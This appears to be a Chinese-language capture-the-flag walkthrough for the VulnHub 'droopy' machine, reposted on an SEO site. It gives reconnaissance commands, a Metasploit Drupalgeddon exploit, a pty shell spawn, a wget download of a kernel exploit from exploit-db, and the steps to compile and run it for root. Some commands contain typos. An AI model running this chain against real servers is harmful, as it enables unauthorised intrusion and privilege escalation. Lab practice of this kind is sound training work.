SEO三人行

seo网站_seo自学网 > SEO白帽 > 正文

CTF夺旗挑战!看老外如何玩转! 即刻安全

网络整理:05-02 点击提交给百度收录

你的位置:即刻安全 > 原创翻译 > CTF夺旗挑战!看老外如何玩转!

CTF夺旗挑战!看老外如何玩转!

原创翻译 Eternal 2年前 (2016-08-31) 1999浏览

在这篇文章中,我们将完成一个 CTF系列的 root2boot 挑战!这个演练将在 droopy 这个漏洞框架上完成,这是一个有一定难度的框架平台。我们可以从这里下载到:https://download.vulnhub.com/droopy/ 。

演练开始:

首先让我们来确定我们要攻击的目标,利用 IP 扫描工具 netdiscover 来查找目标 IP:

netdiscover

1

我们要攻击的目标是 192.168.1.103 ,确定目标后我们再利用 nmap 来进行服务端口的扫描:

nmap -A 192.168.1.103

2

通过以上简单的扫描,我们可以看到目标开放了 80 端口,并且使用了带有利用漏洞的 Drupal 7 版本(Drupal是使用PHP语言编写的开源内容管理框架(CMF)),在得到以上信息后,下面我们使用 MSF 来对漏洞进行利用!

search drupal

3

我们使用一下利用模块:

use exploit/multi/http/drupal_drupageddon

msf exploit (drupal_drupageddon)>set rhost 192.168.1.103 (目标机器IP)

msf exploit (drupal_drupageddon)>set rport 80

msf exploit (drupal_drupageddon)>exploit

4

在成功利用了漏洞后,我们得到了一个 meterpreter 的 session ,为了有一个更加直观的显示路径,我们接着使用如下命令,来进入  droopy的终端界面:

hell

echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

进入终端界面后,我们首先来查看该目标系统的内核版本:

lsb_release -a

5

通过以上命令查看,我们得知 该乌班图系统的内核版本为 Ubuntu 14.04 。我们通过 exploit-db.com 这个网站来查找该版本的 exploit !如下:我们成功找到了该版本的 exploit !

6

由于该 exploit 无法再 MSF上直接利用,因此我们需要在目标系统上找到一个有写和执行权限的文件,来下载并执行 exploit !

find / -writable -type d 2>/dev/null

cd /tmp/

wget https://www.exlpoit-db.com/download/37292

8

下面我们来编译并运行 exploit 以获取 root 权限!

mv 37292 37292.c 

gcc 37292.c -o kernel 

chmod 777 kernel 

./kernel 

接着我们通过简单的命令查看,我们是否已经取得 root 权限:

whoami 

cd /root 

ls 

9

接着我们在目标系统上发现了一个名为 dave.tc 的文件,当我们使用浏览器打开它时,提示我们进行下载。我们只需将其拷贝到站点根目录下,进行下载即可!

Cp dave.tc /var/ww/html

Tags:

转载请标注:SEO三人行——CTF夺旗挑战!看老外如何玩转! 即刻安全

搜索
网站分类
标签列表